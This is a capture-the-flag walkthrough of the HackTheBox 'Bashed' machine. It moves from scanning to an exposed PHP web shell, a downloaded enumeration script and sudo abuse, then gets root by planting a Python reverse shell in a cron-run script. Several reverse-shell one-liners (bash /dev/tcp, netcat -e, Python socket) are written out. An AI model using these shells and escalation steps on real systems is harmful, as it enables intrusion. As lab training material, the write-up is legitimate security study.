A very easy Linux box from HackTheBox, exploiting a built in web shell and using bad permissions on an executable to get root.



Starting with the good ol’ nmap scan

nmap -sV -sC -oA bashed.nmap

To see it only has Appache running on port 80

Nmap scan report for
Host is up (0.020s latency).
Not shown: 999 closed tcp ports (conn-refused)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)

Going to the site with the browser, greeted with this on the home page

Navigating around, can see that the developer made phpbash.php on this server and documented it, in his post he leaks that the website has a /uploads/ directory

Running gobuster to see if there is anything else of note

gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -o bashed.dirs

Find a couple more directories

/images               (Status: 301) [Size: 311] [-->]
/uploads              (Status: 301) [Size: 312] [-->]
/php                  (Status: 301) [Size: 308] [-->]    
/css                  (Status: 301) [Size: 308] [-->]    
/dev                  (Status: 301) [Size: 308] [-->]    
/js                   (Status: 301) [Size: 307] [-->] 

/Uploads/ is empty

/php/ has a sendMail.php file

/dev/ has the aforementioned phpbash.php

When we navigate to it drops us into an interactive shell!


With the web shell, going to try and bring in a linux privelege escalation script (LinEnum.sh) via python server

Starting up the server locally (in a directory with the privesc script)

python -m http.server 9001

No curl, have to use wget to copy the file over, but don’t have permission to write in the /var/www/html/dev/ directory (where the phpbash.php script drops you) so have to navigate somewhere where you can copy it over

Navigate to /dev/shm/ and wget the file

cd /dev/shm

But when we try to run it with ./LinEnum.sh, do not have permission, but we do have bash permissions

So run it with

bash LinEnum.sh

Find that we can be run scriptmanager with no password

uid=1000(arrexel) gid=1000(arrexel) groups=1000(arrexel),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)  
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)
[00;33m[+] We can sudo without supplying a password!  
Matching Defaults entries for www-data on bashed:  
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin  
User www-data may run the following commands on bashed:  
(scriptmanager : scriptmanager) NOPASSWD: ALL

So now know that we can use

sudo -u scriptmanager whoami

To run commands as root, but no persistence, so run a quick reverse shell to get persistence as root

sudo -u scriptmanager bash -i >& /dev/tcp/ 0>&1

Doesn’t work, lets try a netcat reverse shell

sudo -u scriptmanager nc -e /bin/sh 9009

Still doesn’t work

Lets just try uploading a reverse shell and executing it, try an add it to the /uploads/ directory from before

Using a reverse php shell from /usr/share/laudanum/php/php-reverse-shell.php, and upload it using the same way, with the python server to the /uploads/ directory

Making sure to change the ip and port information in the file first

Navigating to the file, on /uploads/php-reverse-shell.php, we get a root reverse shell!

But we are only www-data not the root user

$ whoami

Can now persistently change to the scriptmanager user

sudo -u scriptmanager bash

Do not have access to /root/ yet, because we don’t have scriptmanager’s password to use with sudo

But there is a directory named scripts in the / directory

scriptmanager@bashed:/$ cd scripts
cd scripts
scriptmanager@bashed:/scripts$ ls
test.py  test.txt

Lets look at test.py, it’s called every minute by scriptmanager, can check with for the latest file update times

ls -la

It lets you know that the file is updated every minute

Put in a python reverse shell with vi into test.py, and wait for it to execute

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

And now we are root!

(Can check the crontab to see the python script getting executed every minute)

The end :-)